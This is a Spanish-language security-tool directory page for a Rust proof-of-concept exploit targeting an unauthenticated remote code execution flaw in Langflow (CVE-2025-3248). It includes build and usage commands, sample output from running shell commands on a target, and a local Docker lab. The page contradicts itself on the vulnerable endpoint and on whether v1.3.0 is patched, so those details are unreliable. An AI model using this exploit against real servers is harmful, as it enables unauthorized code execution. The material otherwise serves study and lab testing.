Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-3248-POC | Kitploit
Herramientas/GitHubGitHub/b0ysie7e/cve-2025-3248-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubb0ysie7e/cve-2025-3248-poc

CVE-2025-3248-POC

Ver Repositorio
1hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit RCE de Langflow - CVE-2025-3248

⚠️ Aviso legal
Este código está destinado estrictamente solo para fines educativos y de investigación. El uso no autorizado en sistemas sin permiso explícito puede constituir una violación de la ley.
El autor no se hace responsable de ningún uso indebido o actividad maliciosa que involucre esta herramienta.


Información de la vulnerabilidad

CVE-2025-3248 - Crítica

Puntuación CVSS: 9.8 | Puntuación EPSS: 92.57% | Publicado: 22 de mayo de 2025

Versiones afectadas

  • Vulnerable: Todas las versiones ≤ v1.3.0
  • Parcheado: Versiones v1.3.0+

Vector de ataque

El endpoint /api/v1/validate/code acepta código Python sin sanitizar y lo ejecuta directamente con exec(), sin requerir autenticación.

Código vulnerable

root@kitploit:~
# langflow/api/builder/execute.py
exec(code)  # No input validation or sandboxing!

Desglose técnico

Langflow expone un endpoint /api/v1/builder/execute_code que toma código Python proporcionado por el usuario y lo pasa directamente a exec() en el backend. Dado que no hay autenticación ni sandboxing, los atacantes pueden crear payloads arbitrarios para la ejecución de código.

Ejecutar el exploit

Requisitos

  • Rust 1.70+ (instalar mediante rustup)
  • Cargo (administrador de paquetes de Rust)
root@kitploit:~
# Clone repository
git clone <repo-url>
cd CVE-2025-3248-POC

cargo build --release

# ./target/release/CVE-2025-3248-POC
root@kitploit:~
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"

Ejemplo:

root@kitploit:~
❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860, 
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)   

Configuración del laboratorio local

Inicio rápido

root@kitploit:~
> cd lab
> sudo docker-compose up -d

> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'

Detener el laboratorio

root@kitploit:~
> sudo docker-compose down
Descargar herramienta